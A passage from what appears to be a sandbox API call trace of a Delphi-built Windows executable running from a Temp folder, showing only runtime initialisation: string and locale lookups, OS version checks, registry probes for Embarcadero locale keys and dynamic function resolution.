hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0117.094] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0117.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0117.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x6180dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0117.095] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0117.095] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] GetThreadLocale () returned 0x409 [0117.095] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0117.095] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0117.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.095] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0117.095] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0117.096] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724448 [0117.096] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0117.096] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0117.096] GetLastError () returned 0x7a [0117.096] GetLogicalProcessorInformation (in: Buffer=0x6099d0, ReturnedLength=0x12fab0 | out: Buffer=0x6099d0, ReturnedLength=0x12fab0) returned 1 [0117.096] GetCurrentThreadId () returned 0xe60 [0117.096] GetCurrentThreadId () returned 0xe60 [0117.096] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0117.096] GetThreadLocale () returned 0x409 [0117.096] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0117.096] GetThreadLocale () returned 0x409 [0117.096] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0117.096] GetCurrentThreadId () returned 0xe60 [0117.096] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0117.098] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0117.100] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0117.100] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0117.100] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0117.100] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0117.100] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0117.100] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17388911230) returned 1 [0117.100] GetTickCount () returned 0x27c6f [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17388929482) returned 1 [0117.100] GetTickCount () returned 0x27c6f [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x6182bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0117.100] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x60288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x6182bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x6182bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x6182bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x6182bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0117.101] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x61f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0117.101] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x6182bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0117.101] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x61f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0117.102] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0117.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0117.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x61f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0117.102] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0117.102] GetThreadLocale () returned 0x409 [0117.102] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0117.102] GetCurrentThreadId () returned 0xe60 [0117.102] GetCurrentThreadId () returned 0xe60 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0117.102] GetThreadLocale () returned 0x409 [0117.102] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0117.102] GetThreadLocale () returned 0x409 [0117.102] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0117.102] GetCurrentThreadId () returned 0xe60 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, 